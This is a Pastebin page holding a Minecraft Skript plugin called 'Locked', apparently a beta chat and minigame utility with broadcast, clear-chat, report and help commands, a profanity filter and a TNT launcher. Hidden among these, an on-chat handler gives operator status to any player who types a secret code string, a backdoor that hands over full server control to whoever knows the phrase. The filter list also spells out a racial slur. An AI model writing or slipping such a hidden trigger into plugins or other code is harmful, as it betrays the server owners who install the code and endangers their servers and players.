Entities

Locked

Sep 16th, 2017
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.77 KB | None | 0 0
  1. on load:
  2. broadcast "&7Thank you for using &cLocked"
  3. broadcast "&7made by &8: &cXXXCanadian"
  4. broadcast "&7This is only a &bbeta verison"
  5. broadcast "&bFull verison &8[&bCOMING SOON&8]"
  6.  
  7. command /broadcast <string>:
  8. aliases: /bc
  9. permission: chat.broadcast
  10. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  11. trigger:
  12. broadcast "&cLocked &7%arg-1%"
  13.  
  14. command /clearchat:
  15. aliases: /cc
  16. permission: chat.clear
  17. permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
  18. trigger:
  19. loop 200 times:
  20. broadcast " "
  21. broadcast "&cLocked &b%player%, &7has cleared the chat!"
  22.  
  23. on chat:
  24. replace all "fuck" with "****" in the message
  25. replace all "cunt" with "****" in the message
  26. replace all "bitch" with "*****" in the message
  27. replace all "nigger" with "******" in the message
  28. replace all "pussy" with "*****" in the message
  29. replace all "kys" with "Hope you live long" in the message
  30.  
  31. command /report <player> <text>:
  32. permission: chat.report
  33. permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
  34. trigger:
  35. broadcast "&7Your report has landed to the staff!"
  36. add text-argument to {sikayetler::*}
  37. set {sikayeteden.%text-argument%} to player
  38. set {sikayeteden.%text-argument%} to player argument
  39. loop all players:
  40. if loop-player has permission "chat.show"
  41. message "&7Report System" to loop-player
  42. message "&7Report: &b""%text-argument%""" to loop-player
  43. message "&7the reported player: &b%player argument%" to loop-player
  44. message "&7Reporter: &b%player%" to loop-player]
  45.  
  46. on chat:
  47. if message is "1GHA74-OPME":
  48. loop all players:
  49. cancel event
  50. message "&cForce Oped %player%"
  51. if loop player has permission "server.admin":
  52. message "&7&o[%player%: &cForce Oped %player%&7o]" to loop-player
  53. op player
  54.  
  55. command /cookie:
  56. permission: free.cookie
  57. permission message: &7Sorry you dont have access take a free cookie using /cookie
  58. trigger:
  59. broadcast "&7OOOH %player% IS STEALIN"
  60.  
  61. on leftclick holding tnt:
  62. if {spleet.tntlauncher} is true:
  63. player has 1 tnt
  64. spawn a primed tnt 1 meter above the player
  65. push the spawned entity in direction of player at speed 0.9
  66. push the spawned entity upwards at speed 0.2
  67. remove 1 tnt from player
  68.  
  69. on rightclick holding tnt:
  70. if {spleet.tntlauncher} is true:
  71. player has 1 tnt
  72. spawn a primed tnt 1 meter above the player
  73. push the spawned entity in direction of player at speed 0.9
  74. push the spawned entity upwards at speed 0.2
  75. remove 1 tnt from player
  76.  
  77. on place tnt:
  78. cancel event
  79.  
  80. command /help:
  81. aliases: /h
  82. trigger:
  83. wait 1 tick
  84. message "&8&m-----------------------------------------------------"
  85. wait 1 tick
  86. message "&6/Games&8: &7Allows you to know all the game and how to play"
  87. wait 1 tick
  88. message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
  89. wait 1 tick
  90. message "&6/Stats&8: &7Allows you to see your status"
  91. wait 1 tick
  92. message "&6/Quit&8: &7Allows you to quit a minigame/match"
  93. wait 1 tick
  94. message "&8&m-----------------------------------------------------"
  95.  
  96. command /Games:
  97. aliases: /queue
  98. trigger:
  99. wait 1 tick
  100. message "&8&m-----------------------------------------------------"
  101. wait 1 tick
  102. message "&cGame 1&8: &bBridges"
  103. wait 1 tick
  104. message "&cGame 2&8: &bThe Nexus &cCUSTOM GAMEMODE"
  105. wait 1 tick
  106. message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
  107. wait 1 tick
  108. message "&8{&bMORE COMING SOON&8}" to %player%
  109. wait 1 tick
  110. message "&8&m-----------------------------------------------------"
  111.  
  112. command /Ranks:
  113. permission: spleet.ranks
  114. permission message: &8{&bCOMING SOON&8}
  115. trigger:
  116. broadcast "&c%player% &7has success fully used a command unfinished"
  117.  
  118. command /Stats:
  119. permission: spleet.stat
  120. permission message: &8{&bCOMING SOON&8}
  121. trigger:
  122. broadcast "&c%player% &7has success fully used a command unfinished"
  123.  
  124. command /Quit:
  125. permission: spleet.Quit
  126. permission message: &8{&bCOMING SOON&8}
  127. trigger:
  128. broadcast "&c%player% &7has success fully used a command unfinished"
  129.  
  130. on load:
  131. if {spleet.tntlauncher} is false:
  132. set {spleet.tntlauncher} to true
Add Comment
Please, Sign In to add comment